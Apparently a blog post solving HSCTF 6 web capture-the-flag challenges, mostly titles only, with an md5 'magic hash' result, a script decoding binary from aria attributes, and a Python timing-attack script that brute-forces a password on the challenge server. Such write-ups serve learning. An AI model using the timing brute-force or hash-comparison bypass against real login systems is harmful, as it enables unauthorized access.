HSCTF 6 — Web Challenges

1. Inspect Me

2. Agent Keith

3. S-Q-L

4. The Quest

5. Keith Logger

6. md5

[+] found! md5( 0e251288019 ) ---> 0e874956163641961271069404332409
[+] in 251288020 iterations

7. Accessible Rich Internet Applications

from bs4 import BeautifulSoup

with open("index.html") as tx:
soup = BeautifulSoup(tx,"html.parser")

dig= []

for item in soup.find_all('div', {'role':"option"}):
dig.append(int(item['aria-posinset']))

print(len(dig))
def binary2ascii(s):
return ''.join(chr(int(s[i*8:i*8+8],2)) for i in range(len(s)//8))

with open("index.html") as tx:
soup = BeautifulSoup(tx,"html.parser")

a=0
flag=[]

for i in range(0,1040):
flag.append(soup.find('div',{'aria-posinset':str(i)}).contents[0])
a+=1
if a%8==0:
print(binary2ascii("".join(flag)),end='')
flag.clear()

8. Networked Password

import requests
import string

link = 'https://networked-password.web.chal.hsctf.com'
charset = string.letters + string.digits + string.punctuation
# print charset
flag = "hsctf{"
resp = 0
char = ""

while flag[-1] != "}":
for i in charset:
payload = {"password":flag + i}
r = requests.post(link, data = payload)
if r.elapsed.total_seconds() > resp:
resp = r.elapsed.total_seconds()
char = i
flag += char
resp = 0
print "[+] Current Flag: " + flag
[+] Flag: hsctf{s
[+] Flag: hsctf{sm
[+] Flag: hsctf{sm0
[+] Flag: hsctf{sm0l
[+] Flag: hsctf{sm0l_
[+] Flag: hsctf{sm0l_f
[+] Flag: hsctf{sm0l_fl
[+] Flag: hsctf{sm0l_fl4
[+] Flag: hsctf{sm0l_fl4g
[+] Flag: hsctf{sm0l_fl4g}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kamran Saifullah

Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI